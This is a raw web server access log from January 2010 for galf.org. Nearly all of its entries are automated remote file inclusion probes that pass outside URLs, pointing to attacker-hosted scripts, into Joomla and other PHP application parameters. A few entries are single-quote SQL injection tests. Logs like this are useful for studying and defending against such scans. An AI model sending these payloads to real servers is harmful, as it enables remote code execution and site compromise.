216.7.173.20 - - [25/Jan/2010:08:43:21 -0800] "GET /logs/access_090921.log/main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:01 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:01 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:01 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:03 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:03 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.0.160 - - [25/Jan/2010:08:44:03 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:08:44:04 -0800] "GET /logs/access_090907.log/main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:44:15 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:44:15 -0800] "GET /appserv/main.php?appserv_root=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:44:15 -0800] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:44:52 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:44:52 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:44:53 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:44:53 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:44:53 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:44:54 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:46:19 -0800] "GET /logs/access.log////?DOCUMENT_ROOT=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:46:19 -0800] "GET ///?DOCUMENT_ROOT=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:46:19 -0800] "GET /logs////?DOCUMENT_ROOT=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:48:24 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:48:24 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.236.59.169 - - [25/Jan/2010:08:48:24 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:48:55 -0800] "GET /logs/access_090928.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:48:55 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:48:55 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:48:55 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:49:00 -0800] "GET /logs/access_090803.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:49:00 -0800] "GET /logs/access_090914.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:49:00 -0800] "GET /logs/access_091123.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:49:06 -0800] "GET /logs/access_090720.log//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:08:49:06 -0800] "GET /logs/access_091102.log//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:39 -0800] "GET /logs/access_090720.log/errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:39 -0800] "GET /errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:39 -0800] "GET /logs/errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:49:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:08:49:47 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:08:49:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:59 -0800] "GET /logs/errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:59 -0800] "GET /errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.38.5.54 - - [25/Jan/2010:08:49:59 -0800] "GET /logs/access_090720.log/errors.php?error=http://o_mra.wkhc.ac.kr//bbs/icon/private_icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [25/Jan/2010:08:50:30 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [25/Jan/2010:08:50:30 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [25/Jan/2010:08:50:30 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:33 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:33 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:33 -0800] "GET /logs/access_091221.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:38 -0800] "GET /logs/access_090831.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:48 -0800] "GET /logs/access_091116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:53 -0800] "GET /logs/access_090713.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:54 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:56 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:56 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:56 -0800] "GET /logs/access_090921.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:56 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:50:58 -0800] "GET /logs/access_090907.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:51:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:08:51:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:08:51:02 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.37.206 - - [25/Jan/2010:08:51:10 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [25/Jan/2010:08:51:10 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [25/Jan/2010:08:51:10 -0800] "GET /logs/access_090824.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:51:14 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:51:41 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:51:41 -0800] "GET /logs/access_090928.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:51:48 -0800] "GET /logs/access_091109.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.216.33 - - [25/Jan/2010:08:52:13 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
124.217.198.61 - - [25/Jan/2010:08:52:20 -0800] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.bokji.or.kr/id/aut2.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
124.217.198.61 - - [25/Jan/2010:08:52:20 -0800] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.bokji.or.kr/id/aut2.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:52:26 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:52:29 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:52:41 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:47 -0800] "GET /forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:47 -0800] "GET /logs//forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:47 -0800] "GET /logs/access_090921.log//forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:52:50 -0800] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:52:50 -0800] "GET /logs////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:52:50 -0800] "GET /logs/access_090706.log////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:51 -0800] "GET /forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:52 -0800] "GET /logs/access_090921.log//forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:52:52 -0800] "GET /logs//forum/Settings.php?sourcedir=http://www.talesblue.com//bbs/icon/idosyris.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:52:54 -0800] "GET /logs/access_091130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:08:52:56 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:53:01 -0800] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:53:01 -0800] "GET /logs////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:53:01 -0800] "GET /logs/access_090706.log%20%20////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [25/Jan/2010:08:53:32 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [25/Jan/2010:08:53:32 -0800] "GET /logs/access.log//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [25/Jan/2010:08:53:32 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:37 -0800] "GET /errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:37 -0800] "GET /logs/access_090720.log/errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:37 -0800] "GET /logs/errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:47 -0800] "GET /logs/errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:47 -0800] "GET /errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:08:53:47 -0800] "GET /logs/access_090720.log/errors.php?error=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:54:08 -0800] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:54:08 -0800] "GET /logs/access_090706.log////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:54:08 -0800] "GET /logs////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.65.45 - - [25/Jan/2010:08:55:10 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.jgmusica.es/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.22.65.45 - - [25/Jan/2010:08:55:10 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.jgmusica.es/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.22.65.45 - - [25/Jan/2010:08:55:10 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.jgmusica.es/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:08:55:35 -0800] "GET /main.php?sayfa=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.38.55.181 - - [25/Jan/2010:08:55:35 -0800] "GET /main.php?sayfa=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.38.55.181 - - [25/Jan/2010:08:55:36 -0800] "GET /main.php?sayfa=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.38.55.181 - - [25/Jan/2010:08:55:36 -0800] "GET /main.php?sayfa=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
116.34.107.182 - - [25/Jan/2010:08:55:45 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:55:45 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:55:45 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:56:01 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [25/Jan/2010:08:57:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [25/Jan/2010:08:57:13 -0800] "GET /logs/access_090803.log%20%20//lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [25/Jan/2010:08:57:13 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:08:57:24 -0800] "GET /logs/access_090921.log%20%20////administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.65.45 - - [25/Jan/2010:08:57:38 -0800] "GET /logs/access_100111.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.jgmusica.es/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
208.109.184.46 - - [25/Jan/2010:08:57:47 -0800] "GET /logs/access_091228.log%20%20//lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:58:28 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:58:28 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [25/Jan/2010:08:58:28 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [25/Jan/2010:08:58:48 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.reikorea.org/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [25/Jan/2010:08:58:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.reikorea.org/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [25/Jan/2010:08:58:48 -0800] "GET /appserv/main.php?appserv_root=http://www.reikorea.org/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:09:00:49 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:09:00:49 -0800] "GET /bbs//write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org" 143.248.17